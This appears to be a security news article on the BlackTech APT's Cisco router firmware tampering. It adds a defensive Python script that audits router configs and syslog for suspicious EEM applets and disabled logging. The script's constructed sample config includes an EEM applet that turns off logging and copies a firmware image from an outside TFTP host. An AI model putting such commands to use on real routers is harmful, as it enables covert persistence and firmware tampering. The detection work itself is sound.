September's Cisco Attack Draws New Attention To 'BlackTech' APT
The Threat Actor Was First Detected in 2010
The infamous APT group "BlackTech" was tracked targeting Cisco firmware in the U.S. and Japan, security researchers discovered in September. The discovery drew renewed attention to the long-standing threat actor.
Cisco last updated the status of the BlackTech attacks on September 27. The attack on Cisco, in which BlackTech modified Cisco router firmware, is one of the group's most notable operations; firmware modification is one of its most "noteworthy" tactics.
“The most prevalent initial access vector in these attacks involves stolen or weak administrative credentials. As outlined in the report, certain configuration changes, such as disabling logging and downloading firmware, require administrative credentials,” Cisco wrote in its status update.
“There is no indication that any Cisco vulnerabilities were exploited. Attackers used compromised credentials to perform administrative-level configuration and software changes,” Cisco stated in its last update on the situation. Read the full report at Cisco Security.
First detected in 2010, the malicious activities of the BlackTech APT group have spanned a wide range of sectors, including governmental institutions, industrial facilities, technological infrastructure, media outlets, electronic systems, mobile devices, and military establishments.
To remain undetected, BlackTech uses custom-made malware, dual-use tools, and a variety of living-off-the-land methods that abuse existing system resources, such as disabling logging on routers.
The Japan National Police Agency (NPA) and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) have found evidence that BlackTech can modify router firmware and use the domain-trust relationships of routers to move from international subsidiaries to headquarters in Japan and the U.S. Cybercriminals in the black market are constantly updating their tools to evade detection. They also steal code-signing certificates to make their malware look legitimate.
BlackTech actors use custom-made malware payloads and remote access tools (RATs) to gain access to their victims’ computers. These tools are compatible with a variety of operating systems, such as Windows®, Linux®, and FreeBSD®.
The group also takes advantage of living-off-the-land techniques to blend in with normal network activities and operating systems, making it more difficult for endpoint detection and response (EDR) tools to identify them.
Currently, BlackTech’s campaign is targeting foreign branches of American and Japanese companies. Once the group gains access to these networks, they can move up to headquarters networks. CISA and NPA explained as follows: “BlackTech actors take advantage of trusted network relationships between a known victim and other entities to gain more access to target networks.”
BlackTech’s toolkit covers a variety of router models and firmware versions from different vendors. In the case of Cisco routers, the attackers hide in Embedded Event Manager (EEM) rules, which Cisco IOS uses to run automated tasks.
To mitigate BlackTech’s malicious activities, CISA and NPA suggest that network defenders monitor for anomalous traffic, unexpected reboots, and unauthorized downloads of bootloaders and firmware images. It is also important to take advantage of patch management solutions, such as Patch Manager Plus, which can quickly patch over 850 third-party applications.
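The two paragraphs above name the places a defender should look on a Cisco router: EEM applets hidden in the running configuration, logging that has been switched off, and reboots or firmware fetches that nobody scheduled. The script below is an added illustration of that review, written for this article and not code from Cisco, CISA or NPA. It audits a running-config excerpt for EEM applets (flagging any that fetch files over the network), disabled logging and the configured boot image, and scans syslog lines for reload and configuration-change events, rating them higher when the source address falls outside an assumed management network (`10.0.0.0/24`). The configuration excerpt, the syslog lines and the addresses in them are constructed samples.

```python
import ipaddress
import re
from dataclasses import dataclass

# Constructed sample excerpt of a Cisco IOS running-config; no real device is represented.
SAMPLE_CONFIG = """\
hostname branch-rtr-01
!
no logging console
no logging monitor
no logging on
!
boot system flash:c2900-universalk9-mz.SPA.bin
!
event manager applet maint-task
 event timer cron name nightly cron-entry "0 3 * * *"
 action 1.0 cli command "enable"
 action 2.0 cli command "copy tftp://203.0.113.7/image.bin flash:"
!
line vty 0 4
 login local
!
end
"""

# Constructed syslog lines modelled on the IOS %SYS-5-CONFIG_I / %SYS-5-RELOAD format.
SAMPLE_SYSLOG = [
    "Oct 02 03:00:11 branch-rtr-01 142: *Oct  2 03:00:11.301: %SYS-5-CONFIG_I: "
    "Configured from console by vty0 (198.51.100.23)",
    "Oct 02 03:04:52 branch-rtr-01 143: *Oct  2 03:04:52.004: %SYS-5-RELOAD: "
    "Reload requested by admin on vty0 (198.51.100.23). Reload Reason: Reload command.",
    "Oct 02 08:15:00 branch-rtr-01 144: *Oct  2 08:15:00.120: %LINK-3-UPDOWN: "
    "Interface GigabitEthernet0/1, changed state to up",
]

# Assumed management network; a real deployment would load this from inventory.
MGMT_NET = ipaddress.ip_network("10.0.0.0/24")


@dataclass
class Finding:
    severity: str  # "info", "medium" or "high"
    rule: str      # short machine-readable rule name
    detail: str    # the offending line or a human-readable summary


def parse_eem_applets(config):
    """Return {applet_name: [body lines]} for every 'event manager applet' block."""
    applets, current = {}, None
    for line in config.splitlines():
        m = re.match(r"^event manager applet (\S+)", line)
        if m:
            current = m.group(1)
            applets[current] = []
        elif current is not None and line.startswith(" "):
            applets[current].append(line.strip())   # indented lines belong to the applet
        else:
            current = None                          # '!' or a new top-level stanza ends it
    return applets


def audit_config(config):
    """Flag EEM applets, disabled logging and the boot image in a running-config."""
    findings = []
    for name, body in parse_eem_applets(config).items():
        findings.append(Finding("medium", "eem-applet",
                                f"EEM applet '{name}' present ({len(body)} lines); confirm it is sanctioned"))
        for stmt in body:
            # An applet that copies a file from the network can replace firmware or config.
            if re.search(r"\bcopy\b.*\b(tftp|ftp|http|https|scp)://", stmt):
                findings.append(Finding("high", "eem-fetch-image",
                                        f"applet '{name}' fetches a file from the network: {stmt}"))
    for raw in config.splitlines():
        s = raw.strip()
        if re.match(r"^no logging (on|console|monitor|buffered|trap)\b", s):
            findings.append(Finding("high", "logging-disabled", s))
        elif s.startswith("boot system "):
            findings.append(Finding("info", "boot-image", s))  # compare against the known-good baseline
    return findings


RELOAD_RE = re.compile(r"%SYS-5-RELOAD: Reload requested by (\S+) on (\S+) \(([\d.]+)\)")
CONFIG_RE = re.compile(r"%SYS-5-CONFIG_I: Configured from \S+ by (\S+) \(([\d.]+)\)")


def scan_syslog(lines, mgmt_net=MGMT_NET):
    """Report reloads and config changes; rate them high when sourced outside the management net."""
    events = []
    for line in lines:
        m = RELOAD_RE.search(line)
        if m:
            user, tty, ip = m.groups()
            sev = "medium" if ipaddress.ip_address(ip) in mgmt_net else "high"
            events.append(Finding(sev, "reload", f"reload by {user} via {tty} from {ip}"))
            continue
        m = CONFIG_RE.search(line)
        if m:
            tty, ip = m.groups()
            sev = "medium" if ipaddress.ip_address(ip) in mgmt_net else "high"
            events.append(Finding(sev, "config-change", f"configuration changed via {tty} from {ip}"))
    return events


if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG) + scan_syslog(SAMPLE_SYSLOG):
        print(f"[{f.severity:6}] {f.rule:16} {f.detail}")
```

Run against a real device, the config comes from `show running-config` and the syslog lines from the collector; the useful part is diffing the output against a known-good baseline, since a legitimate EEM applet or boot image will always appear once and a new one is what needs explaining.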
Security analysts advise that email should be secured with AI-powered email security solutions such as Trustifi to protect against email tracking, blocking, modification, phishing, account takeover, business email compromise, malware, and ransomware.